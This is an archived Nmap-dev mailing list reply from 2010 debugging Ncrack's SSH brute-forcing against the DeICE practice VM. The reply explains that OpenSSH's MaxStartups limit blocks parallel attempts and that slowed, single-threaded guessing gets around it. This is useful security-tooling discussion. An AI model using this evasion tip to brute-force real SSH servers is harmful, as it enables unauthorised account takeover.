Nmap Development mailing list archives

Re: Ncrack 0.2 Alpha - SSH behaviour


From: Robin Wood <robin () digininja org>
Date: Tue, 31 Aug 2010 12:58:20 +0100

On 31 August 2010 12:49, Mike Westmacott <mike.westmacott () irmplc com> wrote:
Hi,

I've been testing ncrack 0.2 and have found some behavior where for some
wordlists it will report that a password failed even though it is the
correct one yet on others it will be ok.

This may be related to the overall size of the wordlist and also to the
parallelicty in effect. I was testing against DeICE 1.100 with a
username/password that is found as part of the testing against that VM
(I will avoid divulging this info on the list!). I was using a 3.3mb
wordlist which also contains some symbolic and alphanumeric passwords.
If I extract all words that begin with the same letter as the password
then I get a match. If I concat that file together to make it >3.3mb it
still works. If I put the password at various intervals throughout the
original password file it doesn't match (indeed it writes the login
failed) - even when it's the first password.  By removing parallelism
the problem went away. I was only ever testing against 1 explicit user.

I can put together a tar of options, results, debug output and the
dictionary files - please let me know if you would like to see the
results.

Overall though I was hugely impressed by the speed although found
tweaking the retry delay was essential to getting it working ok (or
maybe I was being confused by the problem I have just described - not
sure :)


I've not tried ncrack but I am working on an ssh bruteforcer of my own
and I've found a problem when testing against openssh, there is a
MaxStartups value that governs the "maximum number of concurrent
unauthenticated connections" check man sshd_config for more info.

I don't know if it was designed to protect against brute force attacks
but it does it because if you fire loads of passwords at once then you
trigger this limit and all new connections are rejected.

The default is 10 connections so when I go parallel I hit this limit
fairly quickly, if I go single threaded and put a slight pause in
between attempts then I can go through large lists.

This may be completely down the wrong track but it worth looking at if
it hasn't already been.

Robin
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/


Current thread: